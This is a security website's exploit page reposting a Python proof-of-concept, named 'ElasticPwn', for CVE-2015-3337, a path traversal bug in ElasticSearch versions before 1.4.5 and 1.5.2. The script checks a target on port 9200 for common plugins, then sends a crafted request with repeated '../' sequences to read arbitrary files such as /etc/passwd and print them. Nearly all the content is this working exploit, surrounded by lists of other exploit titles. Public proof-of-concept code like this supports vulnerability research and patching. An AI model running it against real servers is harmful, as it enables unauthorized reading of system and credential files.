首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ElasticSearch 1.4.5 / 1.5.2 - Path Transversal Vulnerability
来源:digitalsec.net 作者:Andujar 发布时间:2015-05-22  
#!/usr/bin/python
# Crappy PoC for CVE-2015-3337 - Reported by John Heasman of DocuSign
# Affects all ElasticSearch versions prior to 1.5.2 and 1.4.5
# Pedro Andujar || twitter: pandujar || email: @segfault.es || @digitalsec.net
# Tested on default Linux (.deb) install /usr/share/elasticsearch/plugins/
#
   
import socket, sys
   
print "!dSR ElasticPwn - for CVE-2015-3337\n"
if len(sys.argv) <> 3:
        print "Ex: %s www.example.com /etc/passwd" % sys.argv[0]
        sys.exit()
   
port = 9200 # Default ES http port
host = sys.argv[1]
fpath = sys.argv[2]
   
def grab(plugin):
        socket.setdefaulttimeout(3)
        s = socket.socket()
        s.connect((host,port))
        s.send("GET /_plugin/%s/../../../../../..%s HTTP/1.0\n"
            "Host: %s\n\n" % (plugin, fpath, host))
        file = s.recv(2048)
        print " [*] Trying to retrieve %s:" % fpath
        if ("HTTP/1.0 200 OK" in file):
            print "\n%s" % file
        else:
            print "[-] File Not Found, No Access Rights or System Not Vulnerable"
   
def pfind(plugin):
    try:
        socket.setdefaulttimeout(3)
        s = socket.socket()
        s.connect((host,port))
        s.send("GET /_plugin/%s/ HTTP/1.0\n"
            "Host: %s\n\n" % (plugin, host))
        file = s.recv(16)
        print "[*] Trying to find plugin %s:" % plugin
        if ("HTTP/1.0 200 OK" in file):
            print "[+] Plugin found!"
            grab(plugin)
            sys.exit()
        else:
            print "[-]  Not Found "
    except Exception, e:
        print "[-] Error connecting to %s: %s" % (host, e)
        sys.exit()
   
# Include more plugin names to check if they are installed
pluginList = ['test','kopf', 'HQ', 'marvel', 'bigdesk', 'head']
   
for plugin in pluginList:
    pfind(plugin)

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Windows 8.0 - 8.1 x64 TrackPop
·Microsoft Windows - Local Priv
·Internet Explorer 11 - Crash P
·Windows - CNG.SYS Kernel Secur
·BulletProof FTP Client 2010 -
·Phoenix Contact ILC 150 ETH PL
·BisonWare FTP Server 3.5 Buffe
·QEMU - Floppy Disk Controller
·iFTP 2.21 Buffer OverFlow Cras
·OpenLitespeed 1.3.9 - Use Afte
·WordPress N-Media Website Cont
·ZOC SSH Client Buffer Overflow
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved